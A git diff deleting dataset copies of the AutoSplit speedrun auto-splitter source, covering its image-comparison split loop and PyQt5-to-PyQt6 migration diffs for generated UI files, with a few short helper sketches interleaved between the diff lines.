self.run_start_time = time.time() - - # First while loop: stays in this loop until all of the split images have been split - while self.split_image_number < self.number_of_split_images: - - # Check if we are not waiting for the split delay to send the key press - if self.waiting_for_split_delay == True: - time_millis = int(round(time.time() * 1000)) - if time_millis < self.split_time: - QtWidgets.QApplication.processEvents() - continue - - self.updateSplitImage() - - # second while loop: stays in this loop until similarity threshold is met - # skip loop if we just finished waiting for the split delay and need to press the split key! 
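# A sketch of the dummy-split grouping built above: a run of dummy images
# (flag 0x01) is grouped with the first following non-dummy split, so skip
# and undo can jump over whole groups. is_dummy stands in for the
# filename-flag check.
def build_split_groups(filenames, is_dummy):
    groups, current = [], []
    for i, name in enumerate(filenames):
        current.append(i)
        # a non-dummy image closes the current group (except at the very end)
        if not is_dummy(name) and i < len(filenames) - 1:
            groups.append(current)
            current = []
    groups.append(current)
    return groups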
- start = time.time() - while True: - # reset if the set screen region window was closed - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - - # loop goes into here if start auto splitter text is "Start Auto Splitter" - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # calculate similarity for reset image - reset_masked = None - capture = None - - if self.shouldCheckResetImage(): - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - - # loop goes into here if start auto splitter text is "Start Auto Splitter" - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # get capture again if needed - masked = (self.flags & 0x02 == 0x02) - if capture is None or masked != reset_masked: - capture = self.getCaptureForComparison(masked) - - # calculate similarity for split image - self.similarity = self.compareImage(self.split_image, self.mask, capture) - - # show live similarity if the checkbox is checked - if self.showlivesimilarityCheckBox.isChecked(): - self.livesimilarityLabel.setText(str(self.similarity)[:4]) - else: - self.livesimilarityLabel.setText(' ') - - # if the similarity becomes higher than highest similarity, set it as such. - if self.similarity > self.highest_similarity: - self.highest_similarity = self.similarity - - # show live highest similarity if the checkbox is checked - if self.showhighestsimilarityCheckBox.isChecked(): - self.highestsimilarityLabel.setText(str(self.highest_similarity)[:4]) - else: - self.highestsimilarityLabel.setText(' ') - - # if its the last split image and last loop number, disable the skip split button - if (self.split_image_number == self.number_of_split_images - 1 and self.loop_number == self.split_image_loop_amount[self.split_image_number]) or (self.groupDummySplitsCheckBox.isChecked() == True and self.dummy_splits_array[self.split_image_number:].count(False) <= 1): - self.skipsplitButton.setEnabled(False) - else: - self.skipsplitButton.setEnabled(True) - - # if its the first split image and first loop, disable the undo split button - if self.split_image_number == 0 and self.loop_number == 1: - self.undosplitButton.setEnabled(False) - else: - self.undosplitButton.setEnabled(True) - - # if the b flag is set, let similarity go above threshold first, then split on similarity below threshold. - # if no b flag, just split when similarity goes above threshold. 
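# A sketch of the capture-reuse rule above: the frame grabbed for the
# reset-image check is reused for the split-image check only when both need
# the same masked/unmasked resize; otherwise a fresh frame is grabbed.
# grab is a stand-in for getCaptureForComparison.
def frame_for_comparison(capture, capture_was_masked, need_masked, grab):
    if capture is None or capture_was_masked != need_masked:
        capture = grab(need_masked)
    return capture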
- if self.flags & 0x04 == 0x04 and self.split_below_threshold == False: - if self.waiting_for_split_delay == False and self.similarity >= self.similaritythresholdDoubleSpinBox.value(): - self.split_below_threshold = True - continue - elif self.flags & 0x04 == 0x04 and self.split_below_threshold == True: - if self.waiting_for_split_delay == False and self.similarity < self.similaritythresholdDoubleSpinBox.value(): - self.split_below_threshold = False - break - else: - if self.waiting_for_split_delay == False and self.similarity >= self.similaritythresholdDoubleSpinBox.value(): - break - - # limit the number of time the comparison runs to reduce cpu usage - fps_limit = self.fpslimitSpinBox.value() - time.sleep((1 / fps_limit) - (time.time() - start) % (1 / fps_limit)) - QtWidgets.QApplication.processEvents() - - # comes here when threshold gets met - - # We need to make sure that this isn't a dummy split before sending - # the key press. - if (self.flags & 0x01 == 0x01): - pass - else: - # If it's a delayed split, check if the delay has passed - # Otherwise calculate the split time for the key press - if self.split_delay > 0 and self.waiting_for_split_delay == False: - self.split_time = int(round(time.time() * 1000)) + self.split_delay - self.waiting_for_split_delay = True - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.currentsplitimagefileLabel.setText(' ') - self.currentSplitImage.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - - # check for reset while delayed and display a counter of the remaining split delay time - delay_start_time = time.time() - while time.time() - delay_start_time < (self.split_delay / 1000): - self.delay_time_left = str(round((self.split_delay / 1000) - (time.time() - delay_start_time), 1)) - self.currentSplitImage.setText('Delayed Split: ' + self.delay_time_left + ' sec remaining') - # check for reset - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # calculate similarity for reset image - if self.shouldCheckResetImage() == True: - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - continue - - QtTest.QTest.qWait(1) - - self.waiting_for_split_delay = False - - # if {p} flag hit pause key, otherwise hit split hotkey - if (self.flags & 0x08 == 0x08): - keyboard.send(str(self.pausehotkeyLineEdit.text())) - else: - keyboard.send(str(self.splitLineEdit.text())) - - # increase loop number if needed, set to 1 if it was the last loop. - if self.loop_number < self.split_image_loop_amount[self.split_image_number]: - self.loop_number = self.loop_number + 1 - else: - self.loop_number = 1 - - # if loop check box is checked and its the last split, go to first split. - # else if current loop amount is back to 1, add 1 to split image number - # else pass, dont change split image number. 
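# The polling loop above is throttled with a phase-locked sleep so that
# comparisons run at the configured FPS regardless of how long a single
# comparison took. Minimal sketch, assuming fps_limit > 0 and a comparison
# faster than one period.
import time

def sleep_to_next_tick(loop_start: float, fps_limit: int) -> None:
    period = 1.0 / fps_limit
    # sleep only for the remainder of the current period, measured from loop_start
    time.sleep(period - (time.time() - loop_start) % period)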
- if self.loopCheckBox.isChecked() and self.split_image_number == self.number_of_split_images - 1 and self.loop_number == 1: - self.split_image_number = 0 - elif self.loop_number == 1: - self.split_image_number = self.split_image_number + 1 - else: - pass - - # set a "pause" split image number. This is done so that it can detect if user hit split/undo split while paused. - pause_split_image_number = self.split_image_number - pause_loop_number = self.loop_number - - # if its not the last split image, pause for the amount set by the user - if self.number_of_split_images != self.split_image_number: - # set current split image to none - self.currentsplitimagefileLabel.setText(' ') - self.currentSplitImage.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.imageloopLabel.setText('Image Loop #: -') - - # if its the last split image and last loop number, disable the skip split button - if (self.split_image_number == self.number_of_split_images - 1 and self.loop_number == self.split_image_loop_amount[self.split_image_number]) or (self.groupDummySplitsCheckBox.isChecked() == True and self.dummy_splits_array[self.split_image_number:].count(False) <= 1): - self.skipsplitButton.setEnabled(False) - else: - self.skipsplitButton.setEnabled(True) - - # if its the first split image and first loop, disable the undo split button - if self.split_image_number == 0 and self.loop_number == 1: - self.undosplitButton.setEnabled(False) - else: - self.undosplitButton.setEnabled(True) - - QtWidgets.QApplication.processEvents() - - # I have a pause loop here so that it can check if the user presses skip split, undo split, or reset here. - # Also updates the current split image text, counting down the time until the next split image - pause_start_time = time.time() - while time.time() - pause_start_time < self.pauseDoubleSpinBox.value(): - self.pause_time_left = str(round((self.pauseDoubleSpinBox.value()) - (time.time() - pause_start_time), 1)) - self.currentSplitImage.setText('None (Paused). 
' + self.pause_time_left + ' sec remaining') - - # check for reset - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # check for skip/undo split: - if self.split_image_number != pause_split_image_number or self.loop_number != pause_loop_number: - break - - # calculate similarity for reset image - if self.shouldCheckResetImage() == True: - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - continue - - QtTest.QTest.qWait(1) - - # loop breaks to here when the last image splits - self.guiChangesOnReset() - - def guiChangesOnStart(self): - self.startautosplitterButton.setText('Running..') - self.browseButton.setEnabled(False) - self.startautosplitterButton.setEnabled(False) - self.resetButton.setEnabled(True) - self.undosplitButton.setEnabled(True) - self.skipsplitButton.setEnabled(True) - self.setsplithotkeyButton.setEnabled(False) - self.setresethotkeyButton.setEnabled(False) - self.setskipsplithotkeyButton.setEnabled(False) - self.setundosplithotkeyButton.setEnabled(False) - self.setpausehotkeyButton.setEnabled(False) - self.custompausetimesCheckBox.setEnabled(False) - self.customthresholdsCheckBox.setEnabled(False) - self.groupDummySplitsCheckBox.setEnabled(False) - QtWidgets.QApplication.processEvents() - - def guiChangesOnReset(self): - self.startautosplitterButton.setText('Start Auto Splitter') - self.imageloopLabel.setText("Image Loop #:") - self.currentSplitImage.setText(' ') - self.currentsplitimagefileLabel.setText(' ') - self.livesimilarityLabel.setText(' ') - self.highestsimilarityLabel.setText(' ') - self.browseButton.setEnabled(True) - self.startautosplitterButton.setEnabled(True) - self.resetButton.setEnabled(False) - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.setsplithotkeyButton.setEnabled(True) - self.setresethotkeyButton.setEnabled(True) - self.setskipsplithotkeyButton.setEnabled(True) - self.setundosplithotkeyButton.setEnabled(True) - self.setpausehotkeyButton.setEnabled(True) - self.custompausetimesCheckBox.setEnabled(True) - self.customthresholdsCheckBox.setEnabled(True) - self.groupDummySplitsCheckBox.setEnabled(True) - QtWidgets.QApplication.processEvents() - - def compareImage(self, image, mask, capture): - if mask is None: - if self.comparisonmethodComboBox.currentIndex() == 0: - return compare.compare_l2_norm(image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 1: - return compare.compare_histograms(image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 2: - return compare.compare_phash(image, capture) - else: - if self.comparisonmethodComboBox.currentIndex() == 0: - return compare.compare_l2_norm_masked(image, capture, mask) - elif self.comparisonmethodComboBox.currentIndex() == 1: - return compare.compare_histograms_masked(image, capture, mask) - elif self.comparisonmethodComboBox.currentIndex() == 2: - return compare.compare_phash_masked(image, capture, mask) - - def getCaptureForComparison(self, masked): - # grab screenshot of capture region - capture = capture_windows.capture_region(self.hwnd, self.rect) - - # if flagged 
as a mask, capture with nearest neighbor interpolation. else don't so that - # threshold settings on versions below 1.2.0 aren't messed up - if (masked): - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), interpolation=cv2.INTER_NEAREST) - else: - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - # convert to BGR - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR) - - return capture - - def shouldCheckResetImage(self): - if self.reset_image is not None and time.time() - self.run_start_time > self.reset_image_pause_time: - return True - - return False - - def findResetImage(self): - self.reset_image = None - self.reset_mask = None - self.reset_image_threshold = None - - reset_image_file = None - for i, image in enumerate(self.split_image_filenames): - if split_parser.is_reset_image(image): - reset_image_file = image - break - - if reset_image_file is None: - return - - self.split_image_filenames.remove(reset_image_file) - - # create reset image and keep in memory - path = self.split_image_directory + reset_image_file - flags = split_parser.flags_from_filename(reset_image_file) - - self.reset_image_threshold = split_parser.threshold_from_filename(reset_image_file) - - self.reset_image_pause_time = split_parser.pause_from_filename(reset_image_file) - if self.reset_image_pause_time is None: - self.reset_image_pause_time = 0 - - # if theres a mask flag, create a mask - if (flags & 0x02 == 0x02): - # create mask based on resized, nearest neighbor interpolated split image - self.reset_image = cv2.imread(path, cv2.IMREAD_UNCHANGED) - self.reset_image = cv2.resize(self.reset_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), - interpolation=cv2.INTER_NEAREST) - lower = np.array([0, 0, 0, 1], dtype="uint8") - upper = np.array([255, 255, 255, 255], dtype="uint8") - self.reset_mask = cv2.inRange(self.reset_image, lower, upper) - - # set split image as BGR - self.reset_image = cv2.cvtColor(self.reset_image, cv2.COLOR_BGRA2BGR) - - # else if there is no mask flag, open image normally. don't interpolate nearest neighbor here so setups before 1.2.0 still work. 
- else: - self.reset_image = cv2.imread(path, cv2.IMREAD_COLOR) - self.reset_image = cv2.resize(self.reset_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - def updateSplitImage(self): - - # get split image path - split_image_file = self.split_image_filenames[0 + self.split_image_number] - self.split_image_path = self.split_image_directory + split_image_file - - # get flags - self.flags = split_parser.flags_from_filename(split_image_file) - - # set current split image in UI - # if flagged as mask, transform transparency into UI's gray BG color - if (self.flags & 0x02 == 0x02): - self.split_image_display = cv2.imread(self.split_image_path, cv2.IMREAD_UNCHANGED) - transparent_mask = self.split_image_display[:, :, 3] == 0 - self.split_image_display[transparent_mask] = [240, 240, 240, 255] - self.split_image_display = cv2.cvtColor(self.split_image_display, cv2.COLOR_BGRA2RGB) - self.split_image_display = cv2.resize(self.split_image_display, (240, 180)) - # if not flagged as mask, open normally - else: - self.split_image_display = cv2.imread(self.split_image_path, cv2.IMREAD_COLOR) - self.split_image_display = cv2.cvtColor(self.split_image_display, cv2.COLOR_BGR2RGB) - self.split_image_display = cv2.resize(self.split_image_display, (240, 180)) - - qImg = QtGui.QImage(self.split_image_display, self.split_image_display.shape[1], - self.split_image_display.shape[0], self.split_image_display.shape[1] * 3, - QtGui.QImage.Format.Format_RGB888) - self.updateCurrentSplitImage.emit(qImg) - self.currentsplitimagefileLabel.setText(split_image_file) - - # if theres a mask flag, create a mask - if (self.flags & 0x02 == 0x02): - - # create mask based on resized, nearest neighbor interpolated split image - self.split_image = cv2.imread(self.split_image_path, cv2.IMREAD_UNCHANGED) - self.split_image = cv2.resize(self.split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), - interpolation=cv2.INTER_NEAREST) - lower = np.array([0, 0, 0, 1], dtype="uint8") - upper = np.array([255, 255, 255, 255], dtype="uint8") - self.mask = cv2.inRange(self.split_image, lower, upper) - - # set split image as BGR - self.split_image = cv2.cvtColor(self.split_image, cv2.COLOR_BGRA2BGR) - - # else if there is no mask flag, open image normally. don't interpolate nearest neighbor here so setups before 1.2.0 still work. - else: - split_image = cv2.imread(self.split_image_path, cv2.IMREAD_COLOR) - self.split_image = cv2.resize(split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - self.mask = None - - # If the unique parameters are selected, go ahead and set the spinboxes to those values - if self.custompausetimesCheckBox.isChecked(): - self.pauseDoubleSpinBox.setValue(split_parser.pause_from_filename(split_image_file)) - - if self.customthresholdsCheckBox.isChecked(): - self.similaritythresholdDoubleSpinBox.setValue(split_parser.threshold_from_filename(split_image_file)) - - # Get delay for split, if any - self.split_delay = split_parser.delay_from_filename(split_image_file) - - # Set Image Loop # - self.imageloopLabel.setText("Image Loop #: " + str(self.loop_number)) - - # need to set split below threshold to false each time an image updates. - self.split_below_threshold = False - - self.similarity = 0 - self.highest_similarity = 0.001 - - # exit safely when closing the window - def closeEvent(self, event): - if self.haveSettingsChanged(): - # give a different warning if there was never a settings file that was loaded successfully, and save as instead of save. 
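# A sketch of the alpha-based mask built above for flagged split images: any
# pixel with alpha in 1..255 participates in the comparison, while fully
# transparent pixels are ignored. The helper name is illustrative.
import cv2
import numpy as np

def mask_from_alpha(bgra: np.ndarray) -> np.ndarray:
    lower = np.array([0, 0, 0, 1], dtype="uint8")
    upper = np.array([255, 255, 255, 255], dtype="uint8")
    return cv2.inRange(bgra, lower, upper)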
- msgBox = QtWidgets.QMessageBox - settings_file_name = "Untitled" \ - if self.last_successfully_loaded_settings_file_path is None \ - else os.path.basename(self.last_successfully_loaded_settings_file_path) - warning_message = f"Do you want to save changes made to settings file {settings_file_name}?" - - warning = msgBox.warning( - self, - "AutoSplit", - warning_message, - msgBox.StandardButton.Yes | msgBox.StandardButton.No | msgBox.StandardButton.Cancel) - - if warning == msgBox.StandardButton.Yes: - # TODO: Don't close if user cancelled the save - self.saveSettingsAs() - exit() - if warning == msgBox.StandardButton.No: - exit() - if warning == msgBox.StandardButton.Cancel: - event.ignore() - else: - event.accept() - sys.exit() - - -def main(): - app = QtWidgets.QApplication(sys.argv) - app.setWindowIcon(QtGui.QIcon('icon.ico')) - w = AutoSplit() - w.setWindowIcon(QtGui.QIcon('icon.ico')) - w.show() - sys.exit(app.exec()) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.diff deleted file mode 100644 index 02ed2b0..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.diff +++ /dev/null @@ -1,58 +0,0 @@ -diff --git a/src/about.py b/src/about.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/about.py - +++ b/src/about.py -@@ -2,11 +2,11 @@ - - # Form implementation generated from reading ui file 'about.ui' - # --# Created by: PyQt5 UI code generator 4.11.4 -+# Created by: PyQt6 UI code generator 4.11.4 - # - # WARNING! All changes made in this file will be lost! - --from PyQt5 import QtCore, QtGui, QtWidgets -+from PyQt6 import QtCore, QtGui, QtWidgets - - try: - _fromUtf8 = QtCore.QString.fromUtf8 -@@ -16,12 +16,14 @@ except AttributeError: - - try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 -+ - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) - except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - -+ - class Ui_aboutAutoSplitWidget(object): - def setupUi(self, aboutAutoSplitWidget): - aboutAutoSplitWidget.setObjectName(_fromUtf8("aboutAutoSplitWidget")) -@@ -29,7 +31,7 @@ class Ui_aboutAutoSplitWidget(object): - aboutAutoSplitWidget.setMinimumSize(QtCore.QSize(276, 249)) - aboutAutoSplitWidget.setMaximumSize(QtCore.QSize(276, 249)) - icon = QtGui.QIcon() -- icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/resources/icon.ico")), QtGui.QIcon.Normal, QtGui.QIcon.Off) -+ icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/resources/icon.ico")), QtGui.QIcon.Mode.Normal, QtGui.QIcon.State.Off) - aboutAutoSplitWidget.setWindowIcon(icon) - self.okButton = QtWidgets.QPushButton(aboutAutoSplitWidget) - self.okButton.setGeometry(QtCore.QRect(190, 220, 71, 21)) -@@ -45,7 +47,7 @@ class Ui_aboutAutoSplitWidget(object): - self.donatetextLabel.setObjectName(_fromUtf8("donatetextLabel")) - self.donatebuttonLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.donatebuttonLabel.setGeometry(QtCore.QRect(52, 127, 171, 91)) -- self.donatebuttonLabel.setAlignment(QtCore.Qt.AlignCenter) -+ self.donatebuttonLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.donatebuttonLabel.setObjectName(_fromUtf8("donatebuttonLabel")) - self.iconLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.iconLabel.setGeometry(QtCore.QRect(190, 17, 62, 71)) -@@ -74,5 +76,4 
@@ if __name__ == "__main__": - ui = Ui_aboutAutoSplitWidget() - ui.setupUi(aboutAutoSplitWidget) - aboutAutoSplitWidget.show() -- sys.exit(app.exec_()) -- -+ sys.exit(app.exec()) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.source.py deleted file mode 100644 index 0898db4..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.source.py +++ /dev/null @@ -1,78 +0,0 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'about.ui' -# -# Created by: PyQt5 UI code generator 4.11.4 -# -# WARNING! All changes made in this file will be lost! - -from PyQt5 import QtCore, QtGui, QtWidgets - -try: - _fromUtf8 = QtCore.QString.fromUtf8 -except AttributeError: - def _fromUtf8(s): - return s - -try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) -except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - -class Ui_aboutAutoSplitWidget(object): - def setupUi(self, aboutAutoSplitWidget): - aboutAutoSplitWidget.setObjectName(_fromUtf8("aboutAutoSplitWidget")) - aboutAutoSplitWidget.resize(276, 249) - aboutAutoSplitWidget.setMinimumSize(QtCore.QSize(276, 249)) - aboutAutoSplitWidget.setMaximumSize(QtCore.QSize(276, 249)) - icon = QtGui.QIcon() - icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/resources/icon.ico")), QtGui.QIcon.Normal, QtGui.QIcon.Off) - aboutAutoSplitWidget.setWindowIcon(icon) - self.okButton = QtWidgets.QPushButton(aboutAutoSplitWidget) - self.okButton.setGeometry(QtCore.QRect(190, 220, 71, 21)) - self.okButton.setObjectName(_fromUtf8("okButton")) - self.createdbyLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.createdbyLabel.setGeometry(QtCore.QRect(10, 44, 151, 16)) - self.createdbyLabel.setObjectName(_fromUtf8("createdbyLabel")) - self.versionLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.versionLabel.setGeometry(QtCore.QRect(10, 21, 71, 16)) - self.versionLabel.setObjectName(_fromUtf8("versionLabel")) - self.donatetextLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.donatetextLabel.setGeometry(QtCore.QRect(46, 95, 191, 41)) - self.donatetextLabel.setObjectName(_fromUtf8("donatetextLabel")) - self.donatebuttonLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.donatebuttonLabel.setGeometry(QtCore.QRect(52, 127, 171, 91)) - self.donatebuttonLabel.setAlignment(QtCore.Qt.AlignCenter) - self.donatebuttonLabel.setObjectName(_fromUtf8("donatebuttonLabel")) - self.iconLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.iconLabel.setGeometry(QtCore.QRect(190, 17, 62, 71)) - self.iconLabel.setObjectName(_fromUtf8("iconLabel")) - - self.retranslateUi(aboutAutoSplitWidget) - self.okButton.clicked.connect(aboutAutoSplitWidget.close) - QtCore.QMetaObject.connectSlotsByName(aboutAutoSplitWidget) - - def retranslateUi(self, aboutAutoSplitWidget): - aboutAutoSplitWidget.setWindowTitle(_translate("aboutAutoSplitWidget", "About AutoSplit", None)) - self.okButton.setText(_translate("aboutAutoSplitWidget", "OK", None)) - self.createdbyLabel.setText(_translate("aboutAutoSplitWidget", "
Created by Toufool and Faschz
", None)) - self.versionLabel.setText(_translate("aboutAutoSplitWidget", "Version: 1.5.0", None)) - self.donatetextLabel.setText(_translate("aboutAutoSplitWidget", "If you enjoy using this program, please\n" -" consider donating. Thank you!", None)) - self.donatebuttonLabel.setText(_translate("aboutAutoSplitWidget", "
", None)) - self.iconLabel.setText(_translate("aboutAutoSplitWidget", "
", None)) - -import resources_rc - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - aboutAutoSplitWidget = QtWidgets.QWidget() - ui = Ui_aboutAutoSplitWidget() - ui.setupUi(aboutAutoSplitWidget) - aboutAutoSplitWidget.show() - sys.exit(app.exec_()) - diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.target.py deleted file mode 100644 index be083d1..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$about.py.target.py +++ /dev/null @@ -1,79 +0,0 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'about.ui' -# -# Created by: PyQt6 UI code generator 4.11.4 -# -# WARNING! All changes made in this file will be lost! - -from PyQt6 import QtCore, QtGui, QtWidgets - -try: - _fromUtf8 = QtCore.QString.fromUtf8 -except AttributeError: - def _fromUtf8(s): - return s - -try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 - - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) -except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - - -class Ui_aboutAutoSplitWidget(object): - def setupUi(self, aboutAutoSplitWidget): - aboutAutoSplitWidget.setObjectName(_fromUtf8("aboutAutoSplitWidget")) - aboutAutoSplitWidget.resize(276, 249) - aboutAutoSplitWidget.setMinimumSize(QtCore.QSize(276, 249)) - aboutAutoSplitWidget.setMaximumSize(QtCore.QSize(276, 249)) - icon = QtGui.QIcon() - icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/resources/icon.ico")), QtGui.QIcon.Mode.Normal, QtGui.QIcon.State.Off) - aboutAutoSplitWidget.setWindowIcon(icon) - self.okButton = QtWidgets.QPushButton(aboutAutoSplitWidget) - self.okButton.setGeometry(QtCore.QRect(190, 220, 71, 21)) - self.okButton.setObjectName(_fromUtf8("okButton")) - self.createdbyLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.createdbyLabel.setGeometry(QtCore.QRect(10, 44, 151, 16)) - self.createdbyLabel.setObjectName(_fromUtf8("createdbyLabel")) - self.versionLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.versionLabel.setGeometry(QtCore.QRect(10, 21, 71, 16)) - self.versionLabel.setObjectName(_fromUtf8("versionLabel")) - self.donatetextLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.donatetextLabel.setGeometry(QtCore.QRect(46, 95, 191, 41)) - self.donatetextLabel.setObjectName(_fromUtf8("donatetextLabel")) - self.donatebuttonLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.donatebuttonLabel.setGeometry(QtCore.QRect(52, 127, 171, 91)) - self.donatebuttonLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.donatebuttonLabel.setObjectName(_fromUtf8("donatebuttonLabel")) - self.iconLabel = QtWidgets.QLabel(aboutAutoSplitWidget) - self.iconLabel.setGeometry(QtCore.QRect(190, 17, 62, 71)) - self.iconLabel.setObjectName(_fromUtf8("iconLabel")) - - self.retranslateUi(aboutAutoSplitWidget) - self.okButton.clicked.connect(aboutAutoSplitWidget.close) - QtCore.QMetaObject.connectSlotsByName(aboutAutoSplitWidget) - - def retranslateUi(self, aboutAutoSplitWidget): - aboutAutoSplitWidget.setWindowTitle(_translate("aboutAutoSplitWidget", "About AutoSplit", None)) - self.okButton.setText(_translate("aboutAutoSplitWidget", "OK", None)) - self.createdbyLabel.setText(_translate("aboutAutoSplitWidget", "
Created by Toufool and Faschz
", None)) - self.versionLabel.setText(_translate("aboutAutoSplitWidget", "Version: 1.5.0", None)) - self.donatetextLabel.setText(_translate("aboutAutoSplitWidget", "If you enjoy using this program, please\n" -" consider donating. Thank you!", None)) - self.donatebuttonLabel.setText(_translate("aboutAutoSplitWidget", "
", None)) - self.iconLabel.setText(_translate("aboutAutoSplitWidget", "
", None)) - -import resources_rc - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - aboutAutoSplitWidget = QtWidgets.QWidget() - ui = Ui_aboutAutoSplitWidget() - ui.setupUi(aboutAutoSplitWidget) - aboutAutoSplitWidget.show() - sys.exit(app.exec()) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.diff deleted file mode 100644 index 5e46a47..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.diff +++ /dev/null @@ -1,306 +0,0 @@ -diff --git a/src/design.py b/src/design.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/design.py - +++ b/src/design.py -@@ -2,11 +2,11 @@ - - # Form implementation generated from reading ui file 'design.ui' - # --# Created by: PyQt5 UI code generator 4.11.4 -+# Created by: PyQt6 UI code generator 4.11.4 - # - # WARNING! All changes made in this file will be lost! - --from PyQt5 import QtCore, QtGui, QtWidgets -+from PyQt6 import QtCore, QtGui, QtWidgets - - try: - _fromUtf8 = QtCore.QString.fromUtf8 -@@ -16,17 +16,19 @@ except AttributeError: - - try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 -+ - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) - except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - -+ - class Ui_MainWindow(object): - def setupUi(self, MainWindow): - MainWindow.setObjectName(_fromUtf8("MainWindow")) - MainWindow.resize(612, 490) -- sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed) -+ sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Policy.Fixed, QtWidgets.QSizePolicy.Policy.Fixed) - sizePolicy.setHorizontalStretch(0) - sizePolicy.setVerticalStretch(0) - sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth()) -@@ -34,10 +36,10 @@ class Ui_MainWindow(object): - MainWindow.setMinimumSize(QtCore.QSize(622, 490)) - MainWindow.setMaximumSize(QtCore.QSize(622, 490)) - icon = QtGui.QIcon() -- 